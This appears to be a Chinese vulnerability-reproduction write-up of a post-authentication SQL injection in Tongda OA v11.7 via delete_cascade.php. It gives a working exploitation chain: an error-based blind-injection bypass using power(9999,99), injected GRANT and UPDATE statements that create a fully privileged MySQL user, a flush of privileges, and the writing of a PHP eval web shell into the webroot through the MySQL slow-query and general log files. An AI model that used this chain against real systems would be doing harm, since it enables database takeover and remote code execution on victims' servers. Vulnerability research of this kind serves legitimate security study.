# 通达OA v11.7后台SQL注入

### 漏洞描述 <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

通达OA v11.7后台存在SQL注入，可通过此漏洞写入恶意后门文件攻击目标服务器

### 漏洞影响 <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>

&#x20;Note

通达OA v11.7

### 环境搭建 <a href="#huan-jing-da-jian" id="huan-jing-da-jian"></a>

[环境地址](https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe)

### 漏洞复现 <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

在 **general/hr/manage/query/delete\_cascade.php** 文件中

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhm3IjiNdyox0K0-30k%2F-Mhm4yif3ifn-rsTiUOK%2Fimage.png?alt=media\&token=a4952894-818d-4ec4-a3c4-cb7cd7b2e614)

首先判断`$condition_cascade`是否为空，如果不为空，则将其中的`\'`替换为`'`。为什么要这样替换呢，主要是因为V11.7版本中，注册变量时考虑了安全问题，将用户输入的字符用`addslashes`函数进行保护，如下：

**inc/common.inc.php** 代码

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhm3IjiNdyox0K0-30k%2F-Mhm50CwTFO_jHLyVPNQ%2Fimage.png?alt=media\&token=a4b68ca2-ab57-4d49-8018-d82d71a6b9a0)

使用盲注对SQL注入进行测试

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhm3IjiNdyox0K0-30k%2F-Mhm52r1zTWdJNDA4_TU%2Fimage.png?alt=media\&token=ac3e4abc-d52c-4d1d-bbee-d86cd7f1ad35)

触发了通达OA的SQL注入拦截

**inc/conn.php**文件中找到过滤机制如下:

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhm3IjiNdyox0K0-30k%2F-Mhm576WNVmqjvbCJN-v%2Fimage.png?alt=media\&token=7ec0133c-9b4e-442b-80c7-67414461dacb)

&#x20;其过滤了一些字符，但是并非无法绕过，盲注的核心是：`substr、if`等函数，均未被过滤，那么只要构造MySQL报错即可配合`if`函数进行盲注了，翻看局外人师傅在补天白帽大会上的分享，发现`power(9999,99)`也可以使数据库报错，所以构造语句：

```
select if((substr(user(),1,1)='r'),1,power(9999,99)) # 当字符相等时，不报错，错误时报错
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhm3IjiNdyox0K0-30k%2F-Mhm5EvciKteX8KzrudI%2Fimage.png?alt=media\&token=6dfd1f20-710c-4d29-b05c-8131def6d8cf)

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhm3IjiNdyox0K0-30k%2F-Mhm5NjS8IzixJlEFPjH%2Fimage.png?alt=media\&token=664e0d0c-4e97-4f2f-bbef-b26e57acc60a)

添加SQL数据库用户

```
grant all privileges ON mysql.* TO 'peiqi'@'%' IDENTIFIED BY 'peiqiABC@123' WITH GRANT OPTION
```

访问 [**http://xxx.xxx.xxx.xxx/general/hr/manage/query/delete\_cascade.php?condition\_cascade=grant**](http://xxx.xxx.xxx.xxx/general/hr/manage/query/delete_cascade.php?condition_cascade=grant) **all privileges ON mysql.\* TO 'peiqi'@'%' IDENTIFIED BY 'peiqiABC\@123' WITH GRANT OPTION**

进入 **Myoa/mysql5/bin** 目录 执行 **mysql -upeiqi -p** 输入密码查询所有用户

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhm3IjiNdyox0K0-30k%2F-Mhm5ZMdJsm9b0m3J7WO%2Fimage.png?alt=media\&token=f6753b46-9121-4200-a684-3d26099627bb)

发现成功执行添加一个账户

然后该用户是对mysql数据库拥有所有权限的,然后给自己加权限：

```
UPDATE `mysql`.`user` SET `Password` = '*FBCFBB73CF21D4F464A95E775B40AF27A679CD2D', `Select_priv` = 'Y', `Insert_priv` = 'Y', `Update_priv` = 'Y', `Delete_priv` = 'Y', `Create_priv` = 'Y', `Drop_priv` = 'Y', `Reload_priv` = 'Y', `Shutdown_priv` = 'Y', `Process_priv` = 'Y', `File_priv` = 'Y', `Grant_priv` = 'Y', `References_priv` = 'Y', `Index_priv` = 'Y', `Alter_priv` = 'Y', `Show_db_priv` = 'Y', `Super_priv` = 'Y', `Create_tmp_table_priv` = 'Y', `Lock_tables_priv` = 'Y', `Execute_priv` = 'Y', `Repl_slave_priv` = 'Y', `Repl_client_priv` = 'Y', `Create_view_priv` = 'Y', `Show_view_priv` = 'Y', `Create_routine_priv` = 'Y', `Alter_routine_priv` = 'Y', `Create_user_priv` = 'Y', `Event_priv` = 'Y', `Trigger_priv` = 'Y', `Create_tablespace_priv` = 'Y', `ssl_type` = '', `ssl_cipher` = '', `x509_issuer` = '', `x509_subject` = '', `max_questions` = 0, `max_updates` = 0, `max_connections` = 0, `max_user_connections` = 0, `plugin` = 'mysql_native_password', `authentication_string` = '', `password_expired` = 'Y' WHERE `Host` = Cast('%' AS Binary(1)) AND `User` = Cast('peiqi' AS Binary(5));
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhm3IjiNdyox0K0-30k%2F-Mhm5ejG0Vq0ZOZiMfOQ%2Fimage.png?alt=media\&token=5c6781bb-08ea-4558-b4fd-cb2a57c6ac71)

&#x20;然后用注入点刷新权限，因为该用户是没有刷新权限的权限的：`general/hr/manage/query/delete_cascade.php?condition_cascade=flush privileges;`这样就拥有了所有权限

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhm3IjiNdyox0K0-30k%2F-Mhm5i-chZAcPQ7f1yph%2Fimage.png?alt=media\&token=fd86ce4b-5bf9-4fc0-a6ca-35bc80757301)

登录如果失败，执行

```
grant all privileges ON mysql.* TO 'peiqi'@'%' IDENTIFIED BY 'peiqiABC@123' WITH GRANT OPTION
```

利用漏洞写shell

```
# 查路径：
select @@basedir; # F:\OA\mysql5\，那么web目录就是 F:/OA/webroot/
# 方法1：
set global slow_query_log=on;
set global slow_query_log_file='F:/OA/webroot/';
select '<?php eval($_POST[x]);?>' or sleep(11);
# 方法2：
set global general_log = on;
set global general_log_file = 'F:/OA/webroot/';
select '<?php eval($_POST[x]);?>';
show variables like '%general%';
```

上传大马

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhm3IjiNdyox0K0-30k%2F-Mhm5nKwMU3-El5ZGE01%2Fimage.png?alt=media\&token=82deb7db-87f0-4439-a2a9-7bee54b79020)

### 参考文章 <a href="#can-kao-wen-zhang" id="can-kao-wen-zhang"></a>

[通达OA v11.7后台SQL注入到RCE\[0day\]](https://mp.weixin.qq.com/s/8rvIT1y_odN2obJ1yAvLbw)